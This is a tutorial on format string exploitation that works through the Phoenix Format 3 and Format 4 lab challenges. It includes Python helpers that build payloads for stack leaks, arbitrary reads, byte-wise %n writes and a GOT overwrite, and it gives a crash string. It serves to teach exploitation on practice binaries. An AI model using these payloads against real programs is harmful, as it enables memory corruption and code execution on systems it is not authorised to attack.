Format String Exploits
Theory
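Format string vulnerabilities happen when user input is passed as the format string itself, as in printf(input).
And not when it is passed as an argument to a fixed format string, as in printf("%s", input).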
Reading from the stack
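You can specify more format specifiers than there are parameters to the printf, thereby reading more from the stack than what is expected. For example, printf("%x %x %x %x") with no further arguments prints four words taken from the stack.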
Accessing the n-th element
An attacker can even directly access the n-th argument on the stack by using the positional form of a format specifier, for example %7$x for the 7th argument.
Note: this is not always enabled, and does not always work! In that case, you can still just specify enough %x’s to get to where you want.
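As a minimal sketch of the two approaches, the helpers below build both kinds of payload as byte strings. The function names are hypothetical, and the index 7 is only an illustration; the real index depends on the target's stack layout.

```python
def walk_stack_payload(count):
    """Return `count` sequential %08x specifiers; each one consumes one stack word."""
    return b".".join([b"%08x"] * count)


def direct_access_payload(n, conversion="x"):
    """Return a positional specifier that reads the n-th argument directly."""
    if n < 1:
        raise ValueError("positional arguments are numbered from 1")
    return f"%{n}${conversion}".encode()


# Fallback that works everywhere: one specifier per stack word.
print(walk_stack_payload(4))
# Shortcut, only where the libc supports positional arguments.
print(direct_access_payload(7))
```

The separator in the first payload is only there to make the leaked words easy to tell apart in the output.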
Reading arbitrary data
When %s is used as the format specifier, the function will treat the data on the stack as an address to go fetch a string from. This means that the attacker can potentially make %s read from any address, even if the data is not located on the stack.
For example, if the bytes \xef\xbe\xad\xde are placed in the format string and a %s is lined up with them on the stack, printf() will print the string located at address 0xdeadbeef.
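A payload of that shape could be built roughly like this. It is a sketch that assumes a 32-bit little-endian target and that the start of the input buffer is reachable as stack argument number offset; both the helper name and the offset value 7 are hypothetical.

```python
import struct


def arbitrary_read_payload(address, offset):
    """Place a 32-bit address in the buffer, then dereference it with %s."""
    packed = struct.pack("<I", address)  # little-endian, 4 bytes
    if b"\x00" in packed:
        # printf stops parsing the format string at the first null byte,
        # so the %s after the address would never be reached.
        raise ValueError("address contains a null byte")
    return packed + f"%{offset}$s".encode()


print(arbitrary_read_payload(0xDEADBEEF, 7))
```

If positional arguments are not available, the same effect needs offset - 1 plain %x specifiers in front of a plain %s.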
Writing to an address
%n will cause the number of characters written so far to be stored into the corresponding function argument. For example, printf("12345%n", &num_char) will store the integer 5 into the variable num_char.
With dummy output characters and width-controlling format specifiers, the attacker can now write arbitrary integers to the location pointed to by the function argument.
For example, %10d will pad the value to 10 characters.
And by using length modifiers (%hn stores a short, %hhn stores a single char), attackers can control exactly how many bytes are written.
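To make the interaction between padding and length modifiers concrete, here is a small model of what ends up in memory. It assumes the usual sizes on a 32-bit little-endian target (int is 4 bytes, short is 2, char is 1); the helper name is hypothetical.

```python
# Bytes stored by each variant, assuming 4-byte int, 2-byte short, 1-byte char.
SIZES = {"n": 4, "hn": 2, "hhn": 1}


def stored_bytes(count, modifier="n"):
    """Return the little-endian bytes that %n, %hn or %hhn would store."""
    size = SIZES[modifier]
    truncated = count % (1 << (8 * size))  # higher bits are dropped
    return truncated.to_bytes(size, "little")


# Python's % operator uses the same width syntax, so it can show the padding:
padded = "%10d" % 42
print(repr(padded), len(padded))

# The same character count stored with each variant:
for modifier in ("n", "hn", "hhn"):
    print(modifier, stored_bytes(0x145, modifier).hex())
```

Only the %hhn variant touches a single byte; the other two also write the higher bytes of the count next to it.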
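Btw, if you just want to crash the application, then something like a long run of %s specifiers (%s%s%s%s%s%s%s%s) should create a segmentation fault, since each one dereferences whatever happens to be on the stack.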
Writing arbitrary values to arbitrary addresses
If you want to write a 32-bit integer to an address with a single %n, the padding can run as high as 2,147,483,647 characters. That’s too much, so you should instead write 1 or 2 bytes at a time. The Phoenix Format 3 example below writes 1 byte at a time with plain %n, but keep in mind that writing 2 bytes at a time with the %hn length modifier is safer, since your writes won’t overflow into unintended addresses.
We can start with the least significant byte (the byte at the lowest address on a little-endian machine, which is the last byte when the value is written out in hex) and then keep overwriting the higher bytes, one byte at a time.
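The arithmetic behind this can be sketched as follows: for each byte, starting from the least significant one, work out how many more characters must be printed so that the low byte of the running count equals the byte to write. The function name and the already_written parameter are hypothetical.

```python
def byte_write_plan(value, already_written=0):
    """Return the extra characters to print before each of the four writes."""
    plan = []
    count = already_written
    for shift in (0, 8, 16, 24):          # least significant byte first
        target = (value >> shift) & 0xFF
        extra = (target - count) % 256    # wraps around when target < low byte
        plan.append(extra)
        count += extra
    return plan


print(byte_write_plan(0x64457845))
print(byte_write_plan(0x64457845, already_written=28))
```

These numbers are totals of characters output between two writes. A width such as the N in %Np has to be reduced by whatever else the payload prints in that gap, and it cannot be smaller than the natural length of the printed value.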
Phoenix Format 3 exploitation
Note 1: We will be overwriting values past the changeme variable. Hope it doesn't break anything.
Note 2: You can put the address before the %p's. It will make the payload significantly shorter.
I made a script for getting the correct output.
Exploit with:
Phoenix Format 3 explanation
The goal of this challenge is to write the value 0x64457845 to the address 0x08049844.
The first things in the payload are the 4 addresses we want to write to (1 address for each byte), separated by some padding.
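A rough sketch of that first part of the payload is shown below. The filler b"AAAA" is an assumption; any 4 non-null bytes would do. The filler is presumably needed because each padded %p between two %n's consumes one stack word, so a dummy word has to sit between consecutive addresses.

```python
import struct


def address_block(base, filler=b"AAAA"):
    """Return base, base+1, base+2 and base+3 as 32-bit little-endian
    addresses, with one filler word between each pair."""
    addresses = [struct.pack("<I", base + i) for i in range(4)]
    return filler.join(addresses)


block = address_block(0x08049844)
print(block, len(block))
```

The length of this block counts towards the number of characters written, so it has to be subtracted from the first padding value.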
Then, enough format specifiers are added to get to the start of the payload on the stack. In this case, 11 %p’s are needed, so we first write 10 %p’s and then %219p. The %219p is necessary because it adds enough padding that the low byte of the number of characters written so far is 0x45. 0x45 is the least significant byte of the value 0x64457845, which is the byte we need to write first.
Then, since the next value on the stack is the correct address, and we have the correct amount of written characters, we can add a %n to write 0x45 to 0x08049844. Because %n stores a full 4-byte integer, it also writes the upper bytes of the count to 0x08049845 through 0x08049847, but we will overwrite those later anyway, so it doesn’t really matter.
Then, we will write %49p to write enough characters that the amount of written characters ends with 0x78, and write that value to the next address using %n. The next address was written to be 0x08049845, 1 byte higher than previously.
Then, %203p will overflow the last byte of the amount of written characters back to 0x45. We write it using %n.
And after repeating the step again to write the last byte to the last address, we will have written the desired value to the desired address!
The last %n has also overwritten the 3 bytes right after the target (0x08049848 to 0x0804984a), but hopefully that won’t break anything.
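The overlapping writes can be replayed on a small byte array to see why the result comes out right. The character counts used here (0x145, 0x178, 0x245, 0x264) are assumed for illustration; only their low bytes matter for the target, and the real counts depend on the exact payload.

```python
import struct


def simulate_writes(counts, size=8):
    """Apply 4-byte little-endian writes at offsets 0, 1, 2, ... in order,
    the way consecutive %n writes to base, base+1, base+2, ... would."""
    memory = bytearray(size)
    for offset, count in enumerate(counts):
        struct.pack_into("<I", memory, offset, count & 0xFFFFFFFF)
    return memory


memory = simulate_writes([0x145, 0x178, 0x245, 0x264])
value = struct.unpack_from("<I", memory, 0)[0]
spill = bytes(memory[4:7])  # the 3 bytes past the 4-byte target

print(hex(value))
print(spill.hex())
```

Each write leaves its low byte in place and its upper bytes are overwritten by the next one, except for the final write, whose upper bytes stay behind as the 3 clobbered bytes.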
Arbitrary code execution
It should be possible to use the format string exploit to overwrite the saved function return address just like we did in the stack smashing section.
However, instead, we will be overwriting the Global Offset Table to gain code execution. This is based on Phoenix Format 4.
Analysing the GOT flow
The program looks something like this:
Looking at it in radare, this is what the call to the exit function looks like:
If we step into that call, the execution goes to this line:
Which will jump to the address specified at the address reloc.exit_228
And indeed, stepping once further, we end up at the address 0xf7f7f543.
So if we could change the value at the address 0x080497e4 to some other address (in the Phoenix challenge, to 0x08048503), then the execution flow would jump to that other address.
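One way such an overwrite could be laid out is sketched here. This is not the byte-at-a-time approach from the previous section: it writes 2 bytes at a time with %hn so that nothing past the 4-byte GOT entry is touched. It assumes the libc supports positional arguments, that argument 1 exists and can be printed with %c, and that the start of the input buffer is stack argument number offset. The function name and the offset value 12 are hypothetical.

```python
import struct


def got_overwrite_payload(got_entry, new_target, offset):
    """Build a format string that stores new_target at got_entry using two
    %hn writes, smaller half first so the character count only grows."""
    halves = sorted([
        (new_target & 0xFFFF, got_entry),              # low half, lower address
        ((new_target >> 16) & 0xFFFF, got_entry + 2),  # high half
    ])
    # Addresses go first so they sit at stack arguments offset and offset + 1.
    payload = b"".join(struct.pack("<I", addr) for _, addr in halves)
    count = len(payload)
    for index, (half, _) in enumerate(halves):
        extra = (half - count) % 0x10000
        if extra:
            # %c prints exactly one character, padded to the given width.
            payload += f"%1${extra}c".encode()
        payload += f"%{offset + index}$hn".encode()
        count += extra
    return payload


print(got_overwrite_payload(0x080497E4, 0x08048503, offset=12))
```

With the values from this challenge the count reaches 0x0804 for the first write and 0x8503 for the second, which together form 0x08048503 at 0x080497e4.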
Solution
Changing the code from “writing arbitrary values to arbitrary addresses” slightly, I arrived at the following solution:
Exploit with: